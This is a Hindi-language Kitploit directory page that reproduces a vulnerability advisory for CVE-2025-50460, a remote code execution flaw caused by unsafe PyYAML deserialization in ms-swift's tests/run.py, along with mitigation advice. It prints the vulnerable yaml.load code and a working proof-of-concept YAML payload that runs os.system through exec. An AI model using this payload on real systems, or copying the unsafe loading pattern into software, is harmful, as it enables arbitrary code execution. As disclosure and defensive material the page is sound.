Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50460 — CVE-2025-50460 के लिए तकनीकी विवरण और एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/anchor0221/cve-2025-50460
स्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षा
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

CVE-2025-50460 के लिए तकनीकी विवरण और एक्सप्लॉइट

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-50460: रिमोट कोड निष्पादन modelscope/ms-swift में असुरक्षित PyYAML डीसीरियलाइज़ेशन के माध्यम से

स्थिति: विश्लेषण की प्रतीक्षा है
यह CVE रिकॉर्ड NVD संवर्धन प्रयासों के लिए चिह्नित किया गया है।

एक रिमोट कोड निष्पादन (RCE) भेद्यता ms-swift प्रोजेक्ट संस्करण 3.3.0 में असुरक्षित डीसीरियलाइज़ेशन के कारण tests/run.py में yaml.load() का उपयोग करते हुए PyYAML लाइब्रेरी (संस्करण = 5.3.1) से मौजूद है। यदि कोई हमलावर --run_config पैरामीटर को दिए गए YAML कॉन्फ़िगरेशन फ़ाइल की सामग्री को नियंत्रित कर सकता है, तो डीसीरियलाइज़ेशन के दौरान मनमाना कोड निष्पादित किया जा सकता है। इससे पूर्ण सिस्टम से समझौता हो सकता है। भेद्यता तब सक्रिय होती है जब एक दुर्भावनापूर्ण YAML फ़ाइल लोड की जाती है, जो os.system() जैसे मनमाने Python कमांड के निष्पादन की अनुमति देती है। PyYAML को संस्करण 5.4 या उच्चतर में अपग्रेड करने और समस्या को कम करने के लिए yaml.safe_load() का उपयोग करने की अनुशंसा की जाती है।

विवरण

एक रिमोट कोड निष्पादन (RCE) भेद्यता modelscope/ms-swift प्रोजेक्ट में मौजूद है, जो PyYAML लाइब्रेरी (≤ 5.3.1) के कमजोर संस्करणों के साथ yaml.load() के असुरक्षित उपयोग के कारण होती है। यह समस्या tests/run.py स्क्रिप्ट में है, जहां उपयोगकर्ता द्वारा प्रदान की गई YAML कॉन्फ़िगरेशन फ़ाइल को yaml.FullLoader के साथ yaml.load() का उपयोग करके डीसीरियलाइज़ किया जाता है।

यदि कोई हमलावर --run_config तर्क को प्रदान की गई YAML कॉन्फ़िगरेशन फ़ाइल को नियंत्रित या बदल सकता है, तो वे एक दुर्भावनापूर्ण पेलोड इंजेक्ट कर सकते हैं जिसके परिणामस्वरूप मनमाना कोड निष्पादन होता है।

प्रभावित रिपॉजिटरी

  • प्रोजेक्ट: modelscope/ms-swift
  • प्रभावित संस्करण: नवीनतम
  • फ़ाइल: tests/run.py
  • GitHub स्थायी लिंक: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • निर्भरता: PyYAML <= 5.3.1

कमजोर कोड

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

प्रूफ ऑफ कॉन्सेप्ट (PoC)

चरण 1: दुर्भावनापूर्ण YAML फ़ाइल बनाएँ (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

चरण 2: कमजोर PyYAML (<= 5.3.1) के साथ निष्पादित करें

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

इसके परिणामस्वरूप os.system का निष्पादन होता है, जो कोड निष्पादन को सिद्ध करता है।

शमन

  • yaml.load() को yaml.safe_load() से बदलें
  • PyYAML को संस्करण 5.4 या बाद में अपग्रेड करें

उदाहरण सुधार:

root@kitploit:~
# पहले
yaml.load(f, Loader=yaml.FullLoader)

# बाद में
yaml.safe_load(f)

CVE स्थिति

फ़ील्डमान
CVE आईडीCVE-2025-50460
CVSS स्कोरTBD
CWECWE-502: अविश्वसनीय डेटा का डीसीरियलाइज़ेशन
रिपोर्ट दिनांक2025-04-25
प्रकटीकरण दिनांक2025-07-30
प्रभावित संस्करणनवीनतम
फिक्स संस्करण

लेखक

  • खोजकर्ता: Yu Rong (戎誉) और Hao Fan (凡浩)
  • संपर्क: [[email protected] ]
टूल डाउनलोड करें